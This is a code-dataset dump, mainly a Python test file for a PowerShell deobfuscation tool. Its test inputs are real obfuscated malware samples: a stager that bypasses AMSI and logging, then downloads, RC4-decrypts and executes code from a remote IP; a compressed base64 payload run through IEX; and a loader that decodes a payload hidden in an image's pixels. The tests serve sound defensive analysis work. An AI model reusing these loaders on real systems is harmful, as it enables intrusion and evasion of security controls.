| 16.5 | 36 | 0.75 | 18 | 132 | 5.277778 | 0.611111 | 0.294737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 132 | 7 | 37 | 18.857143 | 0.848214 | 0.219697 | 0 | 0 | 0 | 0 | 0.052083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
c91fa8b4f6b178ccaac389e739fe344201ef7d75 | 16,050 | py | Python | test/units/obfuscation/ps1/test_format.py | bronxc/refinery | 9448facf48a0008f27861dd1a5ee8f5218e6bb86 | [
"BSD-3-Clause"
] | 1 | 2022-02-13T20:57:15.000Z | 2022-02-13T20:57:15.000Z | test/units/obfuscation/ps1/test_format.py | bronxc/refinery | 9448facf48a0008f27861dd1a5ee8f5218e6bb86 | [
"BSD-3-Clause"
] | null | null | null | test/units/obfuscation/ps1/test_format.py | bronxc/refinery | 9448facf48a0008f27861dd1a5ee8f5218e6bb86 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ... import TestUnitBase
class TestFormatString(TestUnitBase):
def setUp(self):
super().setUp()
self.unit = self.load()
def test_split_format_string(self):
self.assertEqual(self.unit(BR'''"{0}$SEP{1}"-f 'Hello',"World"'''), B'"Hello${SEP}World"')
def test_invalid_format(self):
data = BR'''"{0}{2}{1}"-f 'Hello',"World"'''
self.assertEqual(self.unit(data), data)
def test_trivial(self):
self.assertEqual(self.unit(BR""""{0}{2}{1}"-f 'signa','ures','t'"""), b'"signatures"')
def test_all_single_quotes(self):
self.assertEqual(self.unit(BR"""'{0}{2}{1}'-f 'signa','ures','t'"""), b'"signatures"')
def test_mixed_quotes(self):
self.assertEqual(self.unit(BR'''"{0}{2}{1}"-f 'signa','ures',"t"'''), b'"signatures"')
def test_format_string_with_chars(self):
self.assertEqual(self.unit(b'("{0}na{2}{1}"-f \'sig\',\'ures\',\'t\')'), b'("signatures")')
def test_real_world_01(self):
self.assertIn(b'http://131.255.5.65:80', self.unit(
BR''' ( [TYPE]("{3}{14}{2}{6}{7}{10}{11}{1}{9}{5}{4}{0}{12}{13}{8}"-F'nG,sys','RY[','nS.','CoLL','I','TR','Ge','nErIc.d','bjECt','s','iCT','ioNa','TEM.','o','eCtIo') ) ; .("{1}{2}{0}" -f 'TEm','Set','-i') ("{2}{0}{1}" -f 'iABle:jHGs','0','Var') ([TYPE]("{3}{0}{2}{1}"-f'CrI','K','PTBLOc','s') ) ; ^&("{1}{0}{2}"-f 'Et','S','-iTem') ("{0}{3}{2}{1}"-f 'VariA','0','E:e8','bL') ([TyPe]("{1}{0}"-F'F','RE')); ${1`6j9}=
[typE]("{2}{6}{8}{4}{7}{0}{5}{3}{1}"-f'Nt','GEr','system.N','aNa','ERViC','M','et.','epoI','S') ; ${3`sR2} = [TYpE]("{2}{0}{3}{1}"-F 'STeM.NeT.W','equESt','SY','ebR') ; .('sv') ("{0}{1}" -f'dt37m','b') ( [tyPe]("{4}{6}{0}{1}{5}{3}{2}"-f'M.neT.Cr','eD','e','CAch','Sy','EnTIaL','ste') ) ; .("{0}{1}" -f'se','t') ('Ut2'+'i') ( [TYPE]("{4}{3}{2}{0}{1}"-f'm.TEXT.ENcODi','nG','e','T','SYS') ); IF(${ps`VE`RsIoNtab`LE}."PsV`E`Rsi`On"."MaJ`OR" -GE 3){${G`Pf}= ( ^&("{3}{0}{1}{2}" -f'Et-VA','Ria','bLE','g') ("{1}{0}"-f'0','E8') -VALUEonLy )."ass`eM`BlY".("{2}{0}{1}" -f'TTY','Pe','GE').Invoke(("{1}{3}{6}{2}{4}{0}{5}" -f'on.Ut','Syst','to','em.Managem','mati','ils','ent.Au'))."GETFiE`ld"(("{2}{3}{4}{0}{1}{5}"-f 'cyS','ettin','c','ac','hedGroupPoli','gs'),'N'+("{4}{2}{1}{0}{3}" -f'ublic,S','P','n','tatic','o'));If(${G`Pf}){${G`Pc}=${g`pf}.("{0}{1}" -f 'G','ETVAlue').Invoke(${n`Ull});If(${g`pc}[("{0}{2}{1}" -f'Scri','tB','p')+("{2}{1}{0}"-f 'ing','ckLogg','lo')]){${G`PC}[("{1}{0}" -f 'ptB','Scri')+("{2}{0}{1}"-f 'kLoggi','ng','loc')][("{3}{1}{0}{2}" -f'p','leScri','tB','Enab')+("{1}{0}{2}" -f 'gin','lockLog','g')]=0;${G`Pc}[("{1}{0}"-f'ptB','Scri')+("{1}{0}{2}"-f'ckLog','lo','ging')][("{0}{5}{7}{4}{2}{1}{6}{3}" -f 'En','nvoc','lockI','gging','ptB','able','ationLo','Scri')]=0}${v`Al}= ${Zh`ex}::("{1}{0}" -f 'eW','n').Invoke();${v`Al}.("{0}{1}" -f'Ad','D').Invoke(("{3}{1}{2}{0}" -f'riptB','bl','eSc','Ena')+("{3}{1}{2}{0}"-f'ng','c','kLoggi','lo'),0);${V`Al}.("{1}{0}"-f'd','Ad').Invoke(("{4}{5}{6}{1}{3}{2}{7}{0}"-f 'ing','ockInv','catio','o','EnableS','cr','iptBl','nLogg'),0);${G`pc}[((("{19}{1}{21}{22}{4}{3}{16}{24}{8}{17}{11}{10}{7}{18}{20}{6}{5}{12}{23}{9}{14}{15}{13}{2}{0}" -f 'B','Y','pt','EZ1m','_MACHIN','sZ1','1mWindow','i','areZ1mPolic','l','1mM','esZ','m','cri','lZ','1mS','S','i','crosof','HKE','tZ','_','LOCAL','PowerShe','oftw')) -CrePLAcE ([chAr]90+[chAr]49+[chAr]109),[chAr]92)+("{0}{3}{1}{2}"-f 'lo','ggin','g','ckLo')]=${V`AL}}ELse{ ( ^&("{0}{2}{3}{1}"-f 
'gEt-','IAbLE','v','AR') ("{1}{0}" -f'gS0','jH') -va )."GEtFiE`Ld"(("{0}{2}{1}"-f 'signa','ures','t'),'N'+("{0}{1}{2}{3}" -f'on','Public,S','ta','tic')).("{1}{0}{2}" -f 'TVa','SE','lue').Invoke(${nu`lL},(^&("{1}{0}{3}{2}" -f'Ew-','N','Ect','OBJ') ("{9}{6}{7}{1}{0}{4}{8}{3}{5}{2}" -f'eR','N','InG]','hSE','iC.HA','t[str','olLe','cTiONS.GE','S','C')))} ( ^&("{0}{1}" -f 'VAR','IAbLe') ("{1}{0}" -f'80','e'))."VAl`Ue"."aSSe`m`BLY".("{1}{2}{0}" -f'Pe','GETT','y').Invoke(("{7}{6}{2}{3}{9}{5}{1}{4}{0}{8}{10}" -f'on.Amsi','omat','ge','m','i','t','a','System.Man','Uti','ent.Au','ls'))^|.('?'){${_}}^|^&('%'){${_}.("{1}{0}{2}"-f 'FIEL','GEt','D').Invoke(("{3}{0}{1}{2}{4}"-f 'In','itFai','l','amsi','ed'),("{0}{2}{1}"-f'No','ic','nPublic,Stat')).("{0}{2}{1}" -f'S','VALUe','eT').Invoke(${N`Ull},${T`RuE})};}; ( ^&("{1}{0}"-f 'm','Ite') ("v"+"Ar"+"IabLe:"+"16J9") )."v`ALue"::"E`xpe`Ct100`c`onti`Nue"=0;${Wc}=^&("{1}{2}{0}"-f 'T','NeW-','Objec') ("{5}{4}{0}{2}{6}{1}{3}"-f'WebC','n','L','T','NEt.','SYstEm.','ie');${u}=("{13}{0}{3}{1}{5}{10}{16}{2}{8}{12}{4}{6}{7}{11}{9}{15}{14}" -f'ozilla/',' (Wi','s ','5.0',';','n',' rv:1','1.0) ','NT 6.1; WOW64;','ke G','d','li',' Trident/7.0','M','ko','ec','ow');${Wc}."HEA`deRs".("{1}{0}"-f 'DD','A').Invoke(("{1}{0}{2}" -f'r-Age','Use','nt'),${u});${wC}."pR`oXY"= ( ^&("{2}{0}{1}"-f 'iAb','le','GET-vaR') ("3"+"Sr2") )."va`lUe"::"Defa`U`Ltweb`PrOxy";${WC}."p`ROXy"."CR`E`dEnTI`AlS" = ( ^&("{2}{1}{0}" -f 'teM','di','Chil') ("{1}{3}{2}{0}"-f'mb','varIaBLE:','T37','d') )."V`Alue"::"dEfA`UL`TNeT`Wo`RKcredentiAls";${SC`R`ipT`:`PRoxy} = ${wc}."P`RoXy";${K}= (^&("{0}{1}" -f 'va','riabLe') ('Ut2'+'i') )."v`ALuE"::"a`SCIi".("{1}{2}{0}" -f'ES','G','ETBYT').Invoke(("{5}{1}{4}{0}{3}{2}" 
-f'c7aa','9acd','9ac5cd9c','0','1811','aede680d435'));${r}={${D},${k}=${aR`GS};${S}=0..255;0..255^|^&('%'){${j}=(${J}+${s}[${_}]+${K}[${_}%${k}."cou`NT"])%256;${S}[${_}],${S}[${J}]=${S}[${J}],${S}[${_}]};${d}^|.('%'){${I}=(${i}+1)%256;${H}=(${h}+${S}[${i}])%256;${s}[${I}],${S}[${h}]=${S}[${h}],${s}[${I}];${_}-bXOR${s}[(${s}[${i}]+${s}[${h}])%256]}};${S`eR}=("{4}{3}{2}{1}{5}{0}"-f '5:80','31.255','//1',':','http','.5.6');${t}=("{3}{0}{2}{1}" -f 'min/ge','p','t.ph','/ad');${Wc}."He`ADErs".("{1}{0}"-f'D','AD').Invoke(("{0}{2}{1}"-f'C','okie','o'),("{4}{2}{1}{0}{5}{3}{6}"-f 'P','=9lSc2HiKKJ0','sion','cFj6vBQukc','ses','j','ypvg='));${D`Ata}=${wC}.("{2}{0}{1}"-f 'aD','DATa','DOWnLo').Invoke(${S`ER}+${t});${i`V}=${da`Ta}[0..3];${D`Ata}=${D`AtA}[4..${D`Ata}."leN`GTH"];-JoIN[CHaR[]](^& ${r} ${d`ATa} (${iv}+${K}))^|.("{1}{0}" -f 'X','IE')'''
))
def test_real_world_02(self):
payload = B'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'
self.assertIn(payload, self.unit(
BR''' "\"(.("{1}{2}{0}" -f 'T','nE','W-objec') ("{6}{5}{0}{3}{2}{8}{1}{7}{4}" -f 'I', 'e', 'cOMPRESSION.', 'o.', 'TEsTREam', 'Ystem.', 'S', 'Fla', 'd')( [syStEm.Io.mEmorYstREam] [cONVeRt]::"Fr`om`BasE6`4sT`RiNg"(("{9}{41}{37}{28}{2}{92}{89}{75}{40}{33}{58}{94}{1}{17}{52}{49}{93}{59}{54}{64}{63}{45}{36}{70}{66}{15}{13}{22}{12}{65}{39}{61}{10}{7}{81}{87}{29}{95}{96}{79}{23}{44}{18}{71}{42}{20}{24}{82}{25}{69}{38}{30}{5}{0}{88}{97}{77}{78}{67}{55}{27}{62}{84}{48}{76}{90}{80}{21}{74}{31}{16}{56}{43}{47}{35}{11}{73}{72}{83}{19}{98}{57}{50}{53}{85}{32}{51}{46}{91}{6}{34}{26}{60}{4}{86}{8}{14}{3}{68}"-f
'A5WT4Ysfzc','9qMq2pivVle3JZbbOIhBeFCyVDVxqqJvQkMViBROixQTBBEMga','4xVg3fZ78OUR9V8','X377s08+/PP7zeP348y/Tl0+P18','Z5TiLVA39KotEnX8m9JX/F2JO4awWO6','NIzLZMqznSDYjZsoP2Nr','+','BoYnCuEIfgVcnQyhezoy8RWTbgJDd3bnrDaUEYNHOsaiaNHYi0qJY3kdL7t','rXS0t3GdynTydk1V2TJd2anb','PZhbq+XGFYT/yn4wOefgxPS9g99ELshBxCYTUGAY9OAIWTDYMBz0kui/p77qPXnYsC+t7nWpqlW9H797vD6++TD/5fNy/vlj/PSt3u+flx/+/THmT9++/OvlTb+/Pl5KuGrYSzhjbGssdY6pr7U','nYbNCqyWgyTkLKcbshQVKGkSlFJKKP4lctGY7pV09RGmcBk9xOEfPrw9DUerU7aWnugknEHM','FwsjnxX','pEzOlhHQRv8IIEqQXycLCL+KGMtDzM0CvFxaLRVOmoasW','qPdOF2wglcTS4pcEh9GeqSh+zBvtS3UVfVDoWriXMOM72HFbIZl3RK6FK0JwDOU','KA9f48t2Hnz7/8M/Xl2s7pn2+l/V8eXv89/H','Q1p57l3CANSBlwdATNVj6VA92WbWnPwpgwm','Kp0ZqXIeMBDbnGhUo+GeY/wRrNRMi9GOj2','zPMO','z2ZNUgZi56','4wa8yHapYhvCWOAUvRgh3mat6TFlriK2i77VeEM3cBlVetPTe1E/cf5meCXnVUAP+PoUP1zbNxGWPygkzYxVCIak93mhJjLv9IH1fjZgd','mRgS3boLFcAgA','6tC4ecVgmY6A0LTMhqsFxLe+cxNJzkZLj','ElBW+PKk6','QacEfD2Va77NzwJrdQSTt850MI','N','fNc9WB05PN0egBR0oNgGVQ9y375QY9MY3RxH','GHPa6o005sv3HbIduw19RcFUFymUs7q4yWX/e7P7Kt7HPwDVfzkcvqwFcNuZ0x70X/8+0KGn/4Y4LIeJGnI3sS1e5aiUX+UeySx','ELK5eegfOLUxPoMZ4CF7DivQFwlszaf5CdlSu','JZa','E','hM','9fcKfZyWMAiDGqgzliJBU4Utz7NCg3OJF1Ufw4ELdmRG+TUg9xDBJGxNGOPNQt4e6PKMYB4','ucTgbleyy+qZM1D4Gbq4GPJ','TqA9/F2sEUHtLzrgM1bjMDvWOtZw6EAY86ce48s9ZZNKguIdNFDZ8xx9iat6Oykw+r+3GSKua7a4lRM2','Wk++j8YGw9RqG4C','r','9o2md0KIRzApojwNan5k1FSRIXO5iATwOatE1c+uu','sfY7ljTHmK4Yqt7nO6ZylrCVcMcYrxj7XdsdW15iK1NMadHC','zU','hO8fCypp97','o+j4pkqjTa59jbWdtuw4+tJkCa','u','6DVEJdwQvWu/lA7z7U2WSg1HgxSYFeEZU+GxOlAkwR3ArXMBCRR3BT39GIK3IOj2JQMfHn+IhLkoa','ZmBDqwogWBwqX7Trm69Y7X2Vi7kQHqG+R9whi+7ERtcfniXRDofNm5EXllhCKJ1XHcxnASGpAEWwqVnzycCyK7W','epq','dV1InkQm/GC8RoKiJBakmip','EpSW88JdEPGSRCkhF','6OLWcEYnXRlY+fICfl63iOEE','UOJA/','BNUs6E','gvkeKjAjT7V0BnEjFnYNRPWaSHZ3sFPSmHzd','R7KHOIMgHK98jAjgu2F21Nh','mo3vMKa1PpquKlVKFtPa7umKrYBJES56ZC','dxgcTT0W+6u7PyNpXH8rIECfxGK','UbgE3sKnms+KBE2UHGVqiiaRC0BUMxS5Uu5hqWArnE0tKWC5rW4+','6YN6k5vKEdYMcDJJ4qQTep','Wuga0w7/ocmcb+YfXe','b
WQXMTQCk3','iruz3UjmFpdOBL','GrjGI4LS4/jia6XMNhUs8ie9WqkoUK3dhFSIxM93zLZbKry2oTTHK8W96YSk1Ysc1OLazzdljC6l3mU6iUV','5wi14au7OM9ThDEJ','vLuwSMaRnxoTYh7xqCv6Tp0VGoTip4xSRJ1bEQqEKgNPa','JuO','YVxEaeiGCjg5xLbKEAl1+N39yt3UkVBQWtg3AZVNjWD0','dctxil0Fou3EW7NO09aFlAUp90dZFTCtOia6CZYhjlABJBVVyNR2b5FGwQzzi6SoelO5UyMlUl','wWC2jl41gk3ZNlIpGq7','ZNQv','qcMtMKxRaavRz46M9ucYC/wNRK31J4BdEW92Y143i2yeJ6snixM4r4x5pDLjJUKw/IFcRtlqwzt/BQU6IeJ1W','fHP/3492v/8v7p++/ffzx/fY/t9fH6zfbd+28f3v9x/nq8vr09fv/Hx9vj7e1+e/zhb1rzeNFu/wM=','hEK9CRPvTFuaTJTYKISTuoFaq6Kt','pbjK3Ntapgzb1SbaGX9tHXoDOqwmFwwBk','ZQOJ2O8wYriHy8BSApmcLGJFViIs35XeieqwPQbU0YxNC5','N1PJNB','WK2hlm+2VUWpQ0bqfGFiWj','l4s4yccl5hNyh4sqvNk2CRNQ4ayDx','GlHolZ','f9/MWBCS0FV74AMMhKhplCBvFNnKFAwcysnDw','81Q9vAWuWUnmFWCMhOoevgulipLpHKtC+qdykAS','1rI+xZScS0eFFBi2rl4GrMcR0SkBLKpmm','UJ','Y1Z2PMoFHhMVxAU','i9VYlK9qdjFpFoglBbVS9LPRaQ2+Tso8','IFrV0yBGVzWUOg3XFhVQwe','AnSeR4TwXcKNYaco6+dNpC+qKaBbQEa2wloPa','yrS4TeOX09MgUJx00b0c6IHgQ6cirJxMoX7YZRFyG5YzDF9KW0pb','DMkLX1l','A88ga+9B/TQo1Q+mwvXyU7vnu','KqbDgrxCy8w','E1hhzA6HYjp4VSV66hqtUTSLRgqm3bw9DR38jMd9','owEkHatt0j32yfiparFjiodOWSoR51cpVJ+jEc','NlMIXB8tLsdg','ijIW7fRdjl7boNbt65yTkQNhwVL0HCAQyY7pev4bcY6ruDIXToexZ/lu32HQM9p8DxlJeXJ6','6xd1p82l6DFjX9wMI+1Xr','jXrm8tHS3r0DC1vlJLNYrjQ','U7pE4U2P7MzYVoBU9Uqeetq4SlkaSJHXqQR2gg0LUyswTR2sT61O+vD1NqDSgnTF05bIUglXhUpvdEtWfsrbGIrU2juRTWFqYdL4+','5cQAJhaLJw3vArTnX','T0t0NGSoQ0RiwpfHQSVSWbLahQF9BSp2YzgjCp1wgYiO9WqHnXCAdMxzBV5d3o68jCPwHtBiZ',
'mu2a6lB+/XbQGGiOmamMsbRZBLE+BQRrC0eI4sbNE5BEywjJjqL0veEU6/0UwsW9NwMxL0/RRN4G0SHGLJm3Oa24n','IO3wLU')),
[syStEm.Io.CoMPressioN.COMprEssionmode]::"dECOm`p`RESs")
|&("{1}{0}{2}"-f 'E','foR','aCh') { .("{2}{0}{1}" -f '-o','bjecT','nEW') ("{3}{2}{4}{0}{1}"-f 'm','reaDER','o.str','SYSTem.i','Ea')( `${_} , [sysTEM.tExT.enCODiNg]::"a`scII")} )."rEAd`ToEnD"( ) |&( `${VER`BOsE`pre`Fe`REnce}."tOS`TrIng"()[1,3]+'x'-JoiN'')"\" | &( $pshOme[21]+$pSHome[30]+'x')
'''
))
def test_real_world_03(self):
result = self.unit(BR'''
&("{1}{0}" -f 'l', 'sa') ("{0}{1}" -f 'e', 'ni') ("{3}{1}{0}{2}" -f 'w-Obj', 'e', 'ect', 'N'); .("{1}{0}" -f 'd-Type', 'Ad') -AssemblyName ("{3}{0}{1}{2}" -f 'em', '.Drawin', 'g', 'Syst'); ${Tm} = (&("{1}{3}{0}{2}" -f 'do', 'Ge', 'm', 't-Ran') ("{2}{3}{4}{1}{5}{0}{6}" -f 'HHD.', 'om3', 'h7', '7', '9s:334.4mgur.c', '6q5q', '9ng'), ("{7}{1}{2}{8}{6}{0}{5}{4}{3}{9}" -f 'om386', '77', '9s:3', '51', '03', '3a', '4mages2.4mgbox.c', 'h', '3', 'TUnraE_o.9ng'))."RepLa`cE"('3', '/'); ${T`m} = (${Tm}."re`pLaCE"('4', 'i'))."REp`LAcE"('9', 'p'); ${rY} = [System.Net.WebRequest]::"CR`eATE"(${T`m}."r`EPLa`Ce"('7', 't')); ${r`Y}."mE`ThOD" = ("{0}{1}" -f 'HEA', 'D'); ${RA} = ${R`Y}."GetR`E`SP`oNsE"(); ${fF} = ${RA}."coNteN`T`LE`NgtH"; if (${F`F} -ge 1000) {
${g} = .("{1}{0}" -f 'ni', 'e') ("{4}{2}{6}{3}{5}{1}{0}" -f 'ap', 'Bitm', 'em.Draw', 'ng', 'Syst', '.', 'i')((.("{1}{0}" -f 'ni', 'e') ("{1}{2}{0}" -f 'lient', 'Net.We', 'bC'))."OP`E`NreAD"(${t`m}."Re`pl`AcE"('7', 't'))); ${o} = &("{0}{1}" -f 'e', 'ni') ("{1}{2}{0}" -f 'e[]', 'B', 'yt') 46080; (0..95) | &('%') { foreach (${x} in(0..479)) {
${p} = ${g}."gET`PI`Xel"(${X}, ${_}); .("{1}{0}" -f 'al', 's') ('Eg') ("{1}{0}" -f 'X', 'Ie'); ${o}[${_} * 480 + ${X}] = ([math]::"flo`oR"((${P}."B"-band15) * 16)-bor(${P}."g"-band 15))
} }; &('eg')('( N' + [System.Text.Encoding]::"u`Tf8"."ge`TS`T`RinG"(${o}[0..45996])); break;
}''')
for keyword in (B'System.Drawing', B'New-Object', B'Net.WebClient'):
self.assertIn(keyword, result)
def test_multiple_occurrences(self):
self.assertEqual(
self.unit(
b'"{10}{1}{0}{5}{9}{7}{8}{7}{3}{6}{2}{7}{4}{4}{10}{5}{1}"'
b"-f'v','n','r','x','s','o','p','e','-','k','i'"
),
b'"invoke-expression"'
)
| 243.181818 | 4,573 | 0.641246 | 1,961 | 16,050 | 5.228455 | 0.381948 | 0.007022 | 0.006145 | 0.004291 | 0.077441 | 0.068468 | 0.058422 | 0.051595 | 0.051595 | 0.051595 | 0 | 0.126156 | 0.057196 | 16,050 | 65 | 4,574 | 246.923077 | 0.551414 | 0.002679 | 0 | 0.090909 | 0 | 0.159091 | 0.802531 | 0.597875 | 0 | 1 | 0 | 0 | 0.227273 | 1 | 0.25 | false | 0 | 0.022727 | 0 | 0.295455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c967e9c135d3c227788ffbbe32568c6d5080ce73 | 321 | py | Python | prof_school_fees/models/__init__.py | mohamedmelsayed/erp-school | 6da9bc4c4634e3b362be18f55300aacf147c32a3 | [
"MIT"
] | null | null | null | prof_school_fees/models/__init__.py | mohamedmelsayed/erp-school | 6da9bc4c4634e3b362be18f55300aacf147c32a3 | [
"MIT"
] | null | null | null | prof_school_fees/models/__init__.py | mohamedmelsayed/erp-school | 6da9bc4c4634e3b362be18f55300aacf147c32a3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2021-TODAY Prof-Dev Integrated(<http://www.prof-dev.com>).
###############################################################################
# from . import fees_terms
from . import fees_element
| 29.181818 | 79 | 0.327103 | 23 | 321 | 4.478261 | 0.782609 | 0.135922 | 0.271845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017123 | 0.090343 | 321 | 10 | 80 | 32.1 | 0.335616 | 0.380062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a39167e1ac2e466125ef39466c1cc39f4f6e65bc | 155 | py | Python | indy_node/server/req_handlers/config_req_handlers/pool_upgrade_handler.py | rantwijk/indy-node | 3cb77dab5482c8b721535020fec41506de819d2e | [
"Apache-2.0"
] | 1 | 2020-01-22T06:43:03.000Z | 2020-01-22T06:43:03.000Z | indy_node/server/req_handlers/config_req_handlers/pool_upgrade_handler.py | rantwijk/indy-node | 3cb77dab5482c8b721535020fec41506de819d2e | [
"Apache-2.0"
] | null | null | null | indy_node/server/req_handlers/config_req_handlers/pool_upgrade_handler.py | rantwijk/indy-node | 3cb77dab5482c8b721535020fec41506de819d2e | [
"Apache-2.0"
] | null | null | null | from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler
class PoolUpgrade(WriteRequestHandler):
pass
